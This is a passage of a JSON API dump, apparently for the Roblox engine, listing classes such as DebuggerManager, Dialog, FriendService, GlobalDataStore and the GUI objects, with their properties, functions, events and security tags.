ype":"bool","type":"Property","Name":"IsEnabled","tags":[],"Class":"DebuggerBreakpoint"},{"ValueType":"int","type":"Property","Name":"Line","tags":["readonly"],"Class":"DebuggerBreakpoint"},{"Superclass":"Instance","type":"Class","Name":"DebuggerManager","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"DebuggingEnabled","tags":["readonly"],"Class":"DebuggerManager"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"script","Default":null}],"Name":"AddDebugger","tags":[],"Class":"DebuggerManager","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"EnableDebugging","tags":["LocalUserSecurity"],"Class":"DebuggerManager","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetDebuggers","tags":[],"Class":"DebuggerManager","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Resume","tags":[],"Class":"DebuggerManager","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StepIn","tags":[],"Class":"DebuggerManager","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StepOut","tags":[],"Class":"DebuggerManager","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StepOver","tags":[],"Class":"DebuggerManager","type":"Function"},{"Arguments":[{"Name":"debugger","Type":"Instance"}],"Name":"DebuggerAdded","tags":[],"Class":"DebuggerManager","type":"Event"},{"Arguments":[{"Name":"debugger","Type":"Instance"}],"Name":"DebuggerRemoved","tags":[],"Class":"DebuggerManager","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"DebuggerWatch","tags":[]},{"ValueType":"string","type":"Property","Name":"Expression","tags":[],"Class":"DebuggerWatch"},{"ReturnType":"void","Arguments":[],"Name":"CheckSyntax","tags":[],"Class":"DebuggerWatch","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Dialog","tags":[]},{"ValueType":"float","type":"Property","Name":"ConversationDistance","tags":[],"Class":"Dialog"},{"ValueType":"string","type":"Property","Name":"GoodbyeDialog","tags":[],"Class":"Dialog"},{"ValueType":"bool","type":"Property","Name":"InUse","tags":[],"Class":"Dialog"},{"ValueType":"string","type":"Property","Name":"InitialPrompt","tags":[],"Class":"Dialog"},{"ValueType":"DialogPurpose","type":"Property","Name":"Purpose","tags":[],"Class":"Dialog"},{"ValueType":"DialogTone","type":"Property","Name":"Tone","tags":[],"Class":"Dialog"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"Instance","Name":"dialogChoice","Default":null}],"Name":"SignalDialogChoiceSelected","tags":["RobloxScriptSecurity"],"Class":"Dialog","type":"Function"},{"Arguments":[{"Name":"player","Type":"Instance"},{"Name":"dialogChoice","Type":"Instance"}],"Name":"DialogChoiceSelected","tags":[],"Class":"Dialog","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"DialogChoice","tags":[]},{"ValueType":"string","type":"Property","Name":"GoodbyeDialog","tags":[],"Class":"DialogChoice"},{"ValueType":"string","type":"Property","Name":"ResponseDialog","tags":[],"Class":"DialogChoice"},{"ValueType":"string","type":"Property","Name":"UserDialog","tags":[],"Class":"DialogChoice"},{"Superclass":"Instance","type":"Class","Name":"DoubleConstrainedValue","tags":[]},{"ValueType":"double","type":"Property","Name":"ConstrainedValue","tags":["hidden"],"Class":"DoubleConstrainedValue"},{"ValueType":"double","type":"Property","Name":"MaxValue","tags":[],"Class":"DoubleConstrainedValue"},{"ValueType":"double","type":"Property","Name":"MinValue","tags":[],"Class":"DoubleConstrainedValue"},{"ValueType":"double","type":"Property","Name":"Value","tags":[],"Class":"DoubleConstrainedValue"},{"Arguments":[{"Name":"value","Type":"double"}],"Name":"Changed","tags":[],"Class":"DoubleConstrainedValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"double"}],"Name":"changed","tags":["deprecated"],"Class":"DoubleConstrainedValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Dragger","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"Axis","Name":"axis","Default":"X"}],"Name":"AxisRotate","tags":[],"Class":"Dragger","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"mousePart","Default":null},{"Type":"Vector3","Name":"pointOnMousePart","Default":null},{"Type":"Objects","Name":"parts","Default":null}],"Name":"MouseDown","tags":[],"Class":"Dragger","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Ray","Name":"mouseRay","Default":null}],"Name":"MouseMove","tags":[],"Class":"Dragger","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"MouseUp","tags":[],"Class":"Dragger","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Explosion","tags":[]},{"ValueType":"float","type":"Property","Name":"BlastPressure","tags":[],"Class":"Explosion"},{"ValueType":"float","type":"Property","Name":"BlastRadius","tags":[],"Class":"Explosion"},{"ValueType":"float","type":"Property","Name":"DestroyJointRadiusPercent","tags":[],"Class":"Explosion"},{"ValueType":"ExplosionType","type":"Property","Name":"ExplosionType","tags":[],"Class":"Explosion"},{"ValueType":"Vector3","type":"Property","Name":"Position","tags":[],"Class":"Explosion"},{"Arguments":[{"Name":"part","Type":"Instance"},{"Name":"distance","Type":"float"}],"Name":"Hit","tags":[],"Class":"Explosion","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"FaceInstance","tags":["notbrowsable"]},{"ValueType":"NormalId","type":"Property","Name":"Face","tags":[],"Class":"FaceInstance"},{"Superclass":"FaceInstance","type":"Class","Name":"Decal","tags":[]},{"ValueType":"float","type":"Property","Name":"LocalTransparencyModifier","tags":["hidden"],"Class":"Decal"},{"ValueType":"float","type":"Property","Name":"Shiny","tags":["deprecated"],"Class":"Decal"},{"ValueType":"float","type":"Property","Name":"Specular","tags":["deprecated"],"Class":"Decal"},{"ValueType":"Content","type":"Property","Name":"Texture","tags":[],"Class":"Decal"},{"ValueType":"float","type":"Property","Name":"Transparency","tags":[],"Class":"Decal"},{"Superclass":"Decal","type":"Class","Name":"Texture","tags":[]},{"ValueType":"float","type":"Property","Name":"StudsPerTileU","tags":[],"Class":"Texture"},{"ValueType":"float","type":"Property","Name":"StudsPerTileV","tags":[],"Class":"Texture"},{"Superclass":"Instance","type":"Class","Name":"Feature","tags":[]},{"ValueType":"NormalId","type":"Property","Name":"FaceId","tags":[],"Class":"Feature"},{"ValueType":"InOut","type":"Property","Name":"InOut","tags":[],"Class":"Feature"},{"ValueType":"LeftRight","type":"Property","Name":"LeftRight","tags":[],"Class":"Feature"},{"ValueType":"TopBottom","type":"Property","Name":"TopBottom","tags":[],"Class":"Feature"},{"Superclass":"Feature","type":"Class","Name":"Hole","tags":["deprecated"]},{"Superclass":"Feature","type":"Class","Name":"MotorFeature","tags":["deprecated"]},{"Superclass":"Instance","type":"Class","Name":"Fire","tags":[]},{"ValueType":"Color3","type":"Property","Name":"Color","tags":[],"Class":"Fire"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"Fire"},{"ValueType":"float","type":"Property","Name":"Heat","tags":[],"Class":"Fire"},{"ValueType":"Color3","type":"Property","Name":"SecondaryColor","tags":[],"Class":"Fire"},{"ValueType":"float","type":"Property","Name":"Size","tags":[],"Class":"Fire"},{"ValueType":"float","type":"Property","Name":"size","tags":["deprecated"],"Class":"Fire"},{"Superclass":"Instance","type":"Class","Name":"FlagStandService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"FlyweightService","tags":[]},{"Superclass":"FlyweightService","type":"Class","Name":"CSGDictionaryService","tags":[]},{"Superclass":"FlyweightService","type":"Class","Name":"NonReplicatedCSGDictionaryService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Folder","tags":[]},{"Superclass":"Instance","type":"Class","Name":"ForceField","tags":[]},{"Superclass":"Instance","type":"Class","Name":"FriendService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetBreakFriendUrl","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetCreateFriendRequestUrl","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetDeleteFriendRequestUrl","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enable","Default":null}],"Name":"SetEnabled","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetFriendsOnlineUrl","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetGetFriendsUrl","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetMakeFriendUrl","tags":["LocalUserSecurity"],"Class":"FriendService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"FunctionalTest","tags":["deprecated"]},{"ValueType":"string","type":"Property","Name":"Description","tags":[],"Class":"FunctionalTest"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":""}],"Name":"Error","tags":[],"Class":"FunctionalTest","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":""}],"Name":"Failed","tags":[],"Class":"FunctionalTest","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":""}],"Name":"Pass","tags":[],"Class":"FunctionalTest","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":""}],"Name":"Passed","tags":[],"Class":"FunctionalTest","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"message","Default":""}],"Name":"Warn","tags":[],"Class":"FunctionalTest","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"GamePassService","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"playerHasPassUrl","Default":null}],"Name":"SetPlayerHasPassUrl","tags":["LocalUserSecurity"],"Class":"GamePassService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"int","Name":"gamePassId","Default":null}],"Name":"PlayerHasPass","tags":[],"Class":"GamePassService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"GameSettings","tags":["notbrowsable"]},{"ValueType":"float","type":"Property","Name":"BubbleChatLifetime","tags":[],"Class":"GameSettings"},{"ValueType":"int","type":"Property","Name":"BubbleChatMaxBubbles","tags":[],"Class":"GameSettings"},{"ValueType":"int","type":"Property","Name":"ChatHistory","tags":[],"Class":"GameSettings"},{"ValueType":"int","type":"Property","Name":"ChatScrollLength","tags":[],"Class":"GameSettings"},{"ValueType":"bool","type":"Property","Name":"CollisionSoundEnabled","tags":["deprecated"],"Class":"GameSettings"},{"ValueType":"float","type":"Property","Name":"CollisionSoundVolume","tags":["deprecated"],"Class":"GameSettings"},{"ValueType":"bool","type":"Property","Name":"HardwareMouse","tags":[],"Class":"GameSettings"},{"ValueType":"int","type":"Property","Name":"MaxCollisionSounds","tags":["deprecated"],"Class":"GameSettings"},{"ValueType":"int","type":"Property","Name":"ReportAbuseChatHistory","tags":[],"Class":"GameSettings"},{"ValueType":"bool","type":"Property","Name":"SoftwareSound","tags":[],"Class":"GameSettings"},{"ValueType":"bool","type":"Property","Name":"SoundEnabled","tags":[],"Class":"GameSettings"},{"ValueType":"bool","type":"Property","Name":"VideoCaptureEnabled","tags":[],"Class":"GameSettings"},{"ValueType":"VideoQualitySettings","type":"Property","Name":"VideoQuality","tags":[],"Class":"GameSettings"},{"Arguments":[{"Name":"recording","Type":"bool"}],"Name":"VideoRecordingChangeRequest","tags":["RobloxScriptSecurity"],"Class":"GameSettings","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"GamepadService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Geometry","tags":[]},{"Superclass":"Instance","type":"Class","Name":"GlobalDataStore","tags":[]},{"ReturnType":"Connection","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"Function","Name":"callback","Default":null}],"Name":"OnUpdate","tags":[],"Class":"GlobalDataStore","type":"Function"},{"ReturnType":"Variant","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"GetAsync","tags":[],"Class":"GlobalDataStore","type":"YieldFunction"},{"ReturnType":"Variant","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"int","Name":"delta","Default":"1"}],"Name":"IncrementAsync","tags":[],"Class":"GlobalDataStore","type":"YieldFunction"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"Variant","Name":"value","Default":null}],"Name":"SetAsync","tags":[],"Class":"GlobalDataStore","type":"YieldFunction"},{"ReturnType":"Tuple","Arguments":[{"Type":"string","Name":"key","Default":null},{"Type":"Function","Name":"transformFunction","Default":null}],"Name":"UpdateAsync","tags":[],"Class":"GlobalDataStore","type":"YieldFunction"},{"Superclass":"GlobalDataStore","type":"Class","Name":"OrderedDataStore","tags":[]},{"ReturnType":"Instance","Arguments":[{"Type":"bool","Name":"ascending","Default":null},{"Type":"int","Name":"pagesize","Default":null},{"Type":"Variant","Name":"minValue","Default":null},{"Type":"Variant","Name":"maxValue","Default":null}],"Name":"GetSortedAsync","tags":[],"Class":"OrderedDataStore","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"GroupService","tags":["notCreatable"]},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"groupId","Default":null}],"Name":"GetAlliesAsync","tags":[],"Class":"GroupService","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[{"Type":"int","Name":"groupId","Default":null}],"Name":"GetEnemiesAsync","tags":[],"Class":"GroupService","type":"YieldFunction"},{"ReturnType":"Variant","Arguments":[{"Type":"int","Name":"groupId","Default":null}],"Name":"GetGroupInfoAsync","tags":[],"Class":"GroupService","type":"YieldFunction"},{"ReturnType":"Array","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetGroupsAsync","tags":[],"Class":"GroupService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"GuiBase","tags":[]},{"Superclass":"GuiBase","type":"Class","Name":"GuiBase2d","tags":["notbrowsable"]},{"ValueType":"Vector2","type":"Property","Name":"AbsolutePosition","tags":["readonly"],"Class":"GuiBase2d"},{"ValueType":"Vector2","type":"Property","Name":"AbsoluteSize","tags":["readonly"],"Class":"GuiBase2d"},{"Superclass":"GuiBase2d","type":"Class","Name":"GuiObject","tags":["notbrowsable"]},{"ValueType":"bool","type":"Property","Name":"Active","tags":[],"Class":"GuiObject"},{"ValueType":"BrickColor","type":"Property","Name":"BackgroundColor","tags":["deprecated","hidden"],"Class":"GuiObject"},{"ValueType":"Color3","type":"Property","Name":"BackgroundColor3","tags":[],"Class":"GuiObject"},{"ValueType":"float","type":"Property","Name":"BackgroundTransparency","tags":[],"Class":"GuiObject"},{"ValueType":"BrickColor","type":"Property","Name":"BorderColor","tags":["deprecated","hidden"],"Class":"GuiObject"},{"ValueType":"Color3","type":"Property","Name":"BorderColor3","tags":[],"Class":"GuiObject"},{"ValueType":"int","type":"Property","Name":"BorderSizePixel","tags":[],"Class":"GuiObject"},{"ValueType":"bool","type":"Property","Name":"ClipsDescendants","tags":[],"Class":"GuiObject"},{"ValueType":"bool","type":"Property","Name":"Draggable","tags":[],"Class":"GuiObject"},{"ValueType":"Object","type":"Property","Name":"NextSelectionDown","tags":[],"Class":"GuiObject"},{"ValueType":"Object","type":"Property","Name":"NextSelectionLeft","tags":[],"Class":"GuiObject"},{"ValueType":"Object","type":"Property","Name":"NextSelectionRight","tags":[],"Class":"GuiObject"},{"ValueType":"Object","type":"Property","Name":"NextSelectionUp","tags":[],"Class":"GuiObject"},{"ValueType":"UDim2","type":"Property","Name":"Position","tags":[],"Class":"GuiObject"},{"ValueType":"float","type":"Property","Name":"Rotation","tags":[],"Class":"GuiObject"},{"ValueType":"bool","type":"Property","Name":"Selectable","tags":[],"Class":"GuiObject"},{"ValueType":"Object","type":"Property","Name":"SelectionImageObject","tags":[],"Class":"GuiObject"},{"ValueType":"UDim2","type":"Property","Name":"Size","tags":[],"Class":"GuiObject"},{"ValueType":"SizeConstraint","type":"Property","Name":"SizeConstraint","tags":[],"Class":"GuiObject"},{"ValueType":"float","type":"Property","Name":"Transparency","tags":["hidden"],"Class":"GuiObject"},{"ValueType":"bool","type":"Property","Name":"Visible","tags":[],"Class":"GuiObject"},{"ValueType":"int","type":"Property","Name":"ZIndex","tags":[],"Class":"GuiObject"},{"ReturnType":"bool","Arguments":[{"Type":"UDim2","Name":"endPosition","Default":null},{"Type":"EasingDirection","Name":"easingDirection","Default":"Out"},{"Type":"EasingStyle","Name":"easingStyle","Default":"Quad"},{"Type":"float","Name":"time","Default":"1"},{"Type":"bool","Name":"override","Default":"false"},{"Type":"Function","Name":"callback","Default":"nil"}],"Name":"TweenPosition","tags":[],"Class":"GuiObject","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"UDim2","Name":"endSize","Default":null},{"Type":"EasingDirection","Name":"easingDirection","Default":"Out"},{"Type":"EasingStyle","Name":"easingStyle","Default":"Quad"},{"Type":"float","Name":"time","Default":"1"},{"Type":"bool","Name":"override","Default":"false"},{"Type":"Function","Name":"callback","Default":"nil"}],"Name":"TweenSize","tags":[],"Class":"GuiObject","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"UDim2","Name":"endSize","Default":null},{"Type":"UDim2","Name":"endPosition","Default":null},{"Type":"EasingDirection","Name":"easingDirection","Default":"Out"},{"Type":"EasingStyle","Name":"easingStyle","Default":"Quad"},{"Type":"float","Name":"time","Default":"1"},{"Type":"bool","Name":"override","Default":"false"},{"Type":"Function","Name":"callback","Default":"nil"}],"Name":"TweenSizeAndPosition","tags":[],"Class":"GuiObject","type":"Function"},{"Arguments":[{"Name":"initialPosition","Type":"UDim2"}],"Name":"DragBegin","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"DragStopped","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"input","Type":"Instance"}],"Name":"InputBegan","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"input","Type":"Instance"}],"Name":"InputChanged","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"input","Type":"Instance"}],"Name":"InputEnded","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseEnter","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseLeave","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseMoved","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseWheelBackward","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseWheelForward","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[],"Name":"SelectionGained","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[],"Name":"SelectionLost","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"state","Type":"UserInputState"}],"Name":"TouchLongPress","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"totalTranslation","Type":"Vector2"},{"Name":"velocity","Type":"Vector2"},{"Name":"state","Type":"UserInputState"}],"Name":"TouchPan","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"scale","Type":"float"},{"Name":"velocity","Type":"float"},{"Name":"state","Type":"UserInputState"}],"Name":"TouchPinch","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"rotation","Type":"float"},{"Name":"velocity","Type":"float"},{"Name":"state","Type":"UserInputState"}],"Name":"TouchRotate","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"swipeDirection","Type":"SwipeDirection"},{"Name":"numberOfTouches","Type":"int"}],"Name":"TouchSwipe","tags":[],"Class":"GuiObject","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"}],"Name":"TouchTap","tags":[],"Class":"GuiObject","type":"Event"},{"Superclass":"GuiObject","type":"Class","Name":"Frame","tags":[]},{"ValueType":"FrameStyle","type":"Property","Name":"Style","tags":[],"Class":"Frame"},{"Superclass":"GuiObject","type":"Class","Name":"GuiButton","tags":["notbrowsable"]},{"ValueType":"bool","type":"Property","Name":"AutoButtonColor","tags":[],"Class":"GuiButton"},{"ValueType":"bool","type":"Property","Name":"Modal","tags":[],"Class":"GuiButton"},{"ValueType":"bool","type":"Property","Name":"Selected","tags":[],"Class":"GuiButton"},{"ValueType":"ButtonStyle","type":"Property","Name":"Style","tags":[],"Class":"GuiButton"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"verb","Default":null}],"Name":"SetVerb","tags":["RobloxScriptSecurity"],"Class":"GuiButton","type":"Function"},{"Arguments":[],"Name":"MouseButton1Click","tags":[],"Class":"GuiButton","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseButton1Down","tags":[],"Class":"GuiButton","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseButton1Up","tags":[],"Class":"GuiButton","type":"Event"},{"Arguments":[],"Name":"MouseButton2Click","tags":[],"Class":"GuiButton","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseButton2Down","tags":[],"Class":"GuiButton","type":"Event"},{"Arguments":[{"Name":"x","Type":"int"},{"Name":"y","Type":"int"}],"Name":"MouseButton2Up","tags":[],"Class":"GuiButton","type":"Event"},{"Superclass":"GuiButton","type":"Class","Name":"ImageButton","tags":[]},{"ValueType":"Content","type":"Property","Name":"Image","tags":[],"Class":"ImageButton"},{"ValueType":"Color3","type":"Property","Name":"ImageColor3","tags":[],"Class":"ImageButton"},{"ValueType":"Vector2","type":"Property","Name":"ImageRectOffset","tags":[],"Class":"ImageButton"},{"ValueType":"Vector2","type":"Property","Name":"ImageRectSize","tags":[],"Class":"ImageButton"},{"ValueType":"float","type":"Property","Name":"ImageTransparency","tags":[],"Class":"ImageButton"},{"ValueType":"ScaleType","type":"Property","Name":"ScaleType","tags":[],"Class":"ImageButton"},{"ValueType":"Rect2D","type":"Property","Name":"SliceCenter","tags":[],"Class":"ImageButton"},{"Superclass":"GuiButton","type":"Class","Name":"TextButton","tags":[]},{"ValueType":"Font","type":"Property","Name":"Font","tags":[],"Class":"TextButton"},{"ValueType":"FontSize","type":"Property","Name":"FontSize","tags":[],"Class":"TextButton"},{"ValueType":"string","type":"Property","Name":"Text","tags":[],"Class":"TextButton"},{"ValueType":"Vector2","type":"Property","Name":"TextBounds","tags":["readonly"],"Class":"TextButton"},{"ValueType":"BrickColor","type":"Property","Name":"TextColor","tags":["deprecated","hidden"],"Class":"TextButton"},{"ValueType":"Color3","type":"Property","Name":"TextColor3","tags":[],"Class":"TextButton"},{"ValueType":"bool","type":"Property","Name":"TextFits","tags":["readonly"],"Class":"TextButton"},{"ValueType":"bool","type":"Property","Name":"TextScaled","tags":[],"Class":"TextButton"},{"ValueType":"Color3","type":"Property","Name":"TextStrokeColor3","tags":[],"Class":"TextButton"},{"ValueType":"float","type":"Property","Name":"TextStrokeTransparency","tags":[],"Class":"TextButton"},{"ValueType":"float","type":"Property","Name":"TextTransparency","tags":[],"Class":"TextButton"},{"ValueType":"bool","type":"Property","Name":"TextWrap","tags":["deprecated"],"Class":"TextButton"},{"ValueType":"bool","type":"Property","Name":"TextWrapped","tags":[],"Class":"TextButton"},{"ValueType":"TextXAlignment","type":"Property","Name":"TextXAlignment","tags":[],"Class":"TextButton"},{"ValueType":"TextYAlignment","type":"Property","Name":"TextYAlignment","tags":[],"Class":"TextButton"},{"Superclass":"GuiObject","type":"Class","Name":"GuiLabel","tags":[]},{"Superclass":"GuiLabel","type":"Class","Name":"ImageLabel","tags":[]},{"ValueType":"Content","type":"Property","Name":"Image","tags":[],"Class":"ImageLabel"},{"ValueType":"Color3","type":"Property","Name":"ImageColor3","tags":[],"Class":"ImageLabel"},{"ValueType":"Vector2","type":"Property","Name":"ImageRectOffset","tags":[],"Class":"ImageLabel"},{"ValueType":"Vector2","type":"Property","Name":"ImageRectSize","tags":[],"Class":"ImageLabel"},{"ValueType":"float","type":"Property","Name":"ImageTransparency","tags":[],"Class":"ImageLabel"},{"ValueType":"ScaleType","type":"Property","Name":"ScaleType","tags":[],"Class":"ImageLabel"},{"ValueType":"Rect2D","type":"Property","Name":"SliceCenter","tags":[],"Class":"ImageLabel"},{"Superclass":"GuiLabel","type":"Class","Name":"TextLabel","tags":[]},{"ValueType":"Font","type":"Property","Name":"Font","tags":[],"Class":"TextLabel"},{"ValueType":"FontSize","type":"Property","Name":"FontSize","tags":[],"Class":"TextLabel"},{"ValueType":"string","type":"Property","Name":"Text","tags":[],"Class":"TextLabel"},{"ValueType":"Vector2","type":"Property","Name":"TextBounds","tags":["readonly"],"Class":"TextLabel"},{"ValueType":"BrickColor","type":"Property","Name":"TextColor","tags":["deprecated","hidden"],"Class":"TextLabel"},{"ValueType":"Color3","type":"Property","Name":"TextColor3","tags":[],"Class":"TextLabel"},{"ValueType":"bool","type":"Property","Name":"TextFits","tags":["readonly"],"Class":"TextLabel"},{"ValueType":"bool","type":"Property","Name":"TextScaled","tags":[],"Class":"TextLabel"},{"ValueType":"Color3","type":"Property","Name":"TextStrokeColor3","tags":[],"Class":"TextLabel"},{"ValueType":"float","type":"Property","Name":"TextStrokeTransparency","tags":[],"Class":"TextLabel"},{"ValueType":"float","type":"Property","Name":"TextTransparency","tags":[],"Class":"TextLabel"},{"ValueType":"bool","type":"Property","Name":"TextWrap","tags":["deprecated"],"Class":"TextLabel"},{"ValueType":"bool","type":"Property","Name":"TextWrapped","tags":[],"Class":"TextLabel"},{"ValueType":"TextXAlignment","type":"Property","Name":"TextXAlignment","tags":[],"Class":"TextLabel"},{"ValueType":"TextYAlignment","type":"Property","Name":"TextYAlignment","tags":[],"Class":"TextLabel"},{"Superclass":"GuiObject","type":"Class","Name":"Scale9Frame","tags":[]},{"ValueType":"Vector2int16","type":"Property","Name":"ScaleEdgeSize","tags":[],"Class":"Scale9Frame"},{"ValueType":"string","type":"Property","Name":"SlicePrefix","tags":[],"Class":"Scale9Frame"},{"Superclass":"GuiObject","type":"Class","Name":"ScrollingFrame","tags":[]},{"ValueType":"Vector2","type":"Property","Name":"AbsoluteWindowSize","tags":["readonly"],"Class":"ScrollingFrame"},{"ValueType":"Content","type":"Property","Name":"BottomImage","tags":[],"Class":"ScrollingFrame"},{"ValueType":"Vector2","type":"Property","Name":"CanvasPosition","tags":[],"Class":"ScrollingFrame"},{"ValueType":"UDim2","type":"Property","Name":"CanvasSize","tags":[],"Class":"ScrollingFrame"},{"ValueType":"Content","type":"Property","Name":"MidImage","tags":[],"Class":"ScrollingFrame"},{"ValueType":"int","type":"Property","Name":"ScrollBarThickness","tags":[],"Class":"ScrollingFrame"},{"ValueType":"bool","type":"Property","Name":"ScrollingEnabled","tags":[],"Class":"ScrollingFrame"},{"ValueType":"Content","type":"Property","Name":"TopImage","tags":[],"Class":"ScrollingFrame"},{"Superclass":"GuiObject","type":"Class","Name":"TextBox","tags":[]},{"ValueType":"bool","type":"Property","Name":"ClearTextOnFocus","tags":[],"Class":"TextBox"},{"ValueType":"Font","type":"Property","Name":"Font","tags":[],"Class":"TextBox"},{"ValueType":"FontSize","type":"Property","Name":"FontSize","tags":[],"Class":"TextBox"},{"ValueType":"bool","type":"Property","Name":"MultiLine","tags":[],"Class":"TextBox"},{"ValueType":"string","type":"Property","Name":"Text","tags":[],"Class":"TextBox"},{"ValueType":"Vector2","type":"Property","Name":"TextBounds","tags":["readonly"],"Class":"TextBox"},{"ValueType":"BrickColor","type":"Property","Name":"TextColor","tags":["deprecated","hidden"],"Class":"TextBox"},{"ValueType":"Color3","type":"Property","Name":"TextColor3","tags":[],"Class":"TextBox"},{"ValueType":"bool","type":"Property","Name":"TextFits","tags":["readonly"],"Class":"TextBox"},{"ValueType":"bool","type":"Property","Name":"TextScaled","tags":[],"Class":"TextBox"},{"ValueType":"Color3","type":"Property","Name":"TextStrokeColor3","tags":[],"Class":"TextBox"},{"ValueType":"float","type":"Property","Name":"TextStrokeTransparency","tags":[],"Class":"TextBox"},{"ValueType":"float","type":"Property","Name":"TextTransparency","tags":[],"Class":"TextBox"},{"ValueType":"bool","type":"Property","Name":"TextWrap","tags":["deprecated"],"Class":"TextBox"},{"ValueType":"bool","type":"Property","Name":"TextWrapped","tags":[],"Class":"TextBox"},{"ValueType":"TextXAlignment","type":"Property","Name":"TextXAlignment","tags":[],"Class":"TextBox"},{"ValueType":"TextYAlignment","type":"Property","Name":"TextYAlignment","tags":[],"Class":"TextBox"},{"ReturnType":"void","Arguments":[],"Name":"CaptureFocus","tags":[],"Class":"TextBox","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsFocused","tags":[],"Class":"TextBox","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ReleaseFocus","tags":[],"Class":"TextBox","type":"Function"},{"Arguments":[{"Name":"enterPressed","Type":"bool"},{"Name":"inputThatCausedFocusLoss","Type":"In